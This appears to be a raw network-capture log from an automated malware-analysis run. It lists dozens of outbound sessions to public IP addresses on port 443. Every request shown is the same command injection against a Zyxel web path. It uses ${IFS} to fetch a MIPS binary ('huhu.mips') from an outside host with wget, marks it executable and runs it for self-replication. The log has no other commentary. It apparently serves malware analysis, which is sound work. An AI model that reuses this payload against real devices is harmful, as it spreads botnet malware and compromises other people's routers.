                                      Jan 19, 2024 17:29:44.009179115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7274192.168.2.1446752176.187.150.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009198904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7275192.168.2.1434882133.199.253.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009232044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7276192.168.2.1454172158.124.20.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009278059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7277192.168.2.1449718199.79.234.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009278059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7278192.168.2.143689292.4.227.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009349108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7279192.168.2.144594898.150.25.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009385109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7280192.168.2.144173890.203.254.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009430885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7281192.168.2.145773639.197.7.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009480000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7282192.168.2.143588688.6.164.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009509087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7283192.168.2.1441296123.202.96.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009546995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7284192.168.2.143776489.62.235.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009567976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7285192.168.2.143754414.188.48.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009632111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7286192.168.2.145454082.36.196.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009654045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7287192.168.2.1449418164.48.127.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009691954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7288192.168.2.1459200211.93.12.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009727001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7289192.168.2.1448566144.145.195.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009773016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7290192.168.2.1441298209.164.184.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009808064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7291192.168.2.1441308137.171.206.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009872913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7292192.168.2.1450184174.68.183.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009907961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7293192.168.2.143732836.248.239.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009929895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7294192.168.2.145163498.69.55.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009980917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7295192.168.2.1433860105.228.195.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010010958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7296192.168.2.14402669.9.127.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010065079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7297192.168.2.143949240.189.70.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010082960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7298192.168.2.1449592209.0.179.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010143042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7299192.168.2.1459022188.18.40.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010169029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7300192.168.2.144311467.134.79.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010206938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7301192.168.2.1451190118.75.246.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010252953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7302192.168.2.143567038.149.47.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010284901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7303192.168.2.145666025.122.98.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010329962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7304192.168.2.1444746122.172.48.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010365009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7305192.168.2.1440328156.141.240.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010409117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7306192.168.2.1438002189.63.112.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010440111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7307192.168.2.1450202198.87.32.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010468006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7308192.168.2.145743243.107.52.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010515928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7309192.168.2.1433372209.145.37.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010571003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7310192.168.2.145551845.215.107.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010601044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7311192.168.2.1437118185.129.131.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010631084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7312192.168.2.1439936172.223.213.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010658979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7313192.168.2.146053846.173.185.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010693073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7314192.168.2.1434228111.52.230.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010729074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7315192.168.2.1458464210.132.96.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010783911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7316192.168.2.1441728198.36.178.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010822058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7317192.168.2.1440838141.219.36.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010864973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7318192.168.2.1458246113.157.132.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010920048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7319192.168.2.1460060103.222.97.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010963917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7320192.168.2.1434638101.190.125.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.010993958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7321192.168.2.144079820.126.181.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011025906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7322192.168.2.145472814.16.2.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011107922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7323192.168.2.1444950142.136.68.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011143923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7324192.168.2.143930019.203.200.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011173010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7325192.168.2.144287263.0.238.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011223078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7326192.168.2.143855678.115.46.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011262894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7327192.168.2.1434504143.6.72.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011316061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7328192.168.2.14435844.129.129.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011336088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7329192.168.2.1434540141.56.219.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011393070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7330192.168.2.1448182159.156.63.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011423111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7331192.168.2.1459448220.125.155.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011480093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7332192.168.2.1434918176.1.75.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011518002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7333192.168.2.1443726140.192.134.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011562109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7334192.168.2.146017475.91.57.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011585951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7335192.168.2.144586897.193.15.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011627913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7336192.168.2.1455056135.86.143.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.011683941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7337192.168.2.1459728170.165.90.44443
                                      TimestampBytes transferredDirectionData
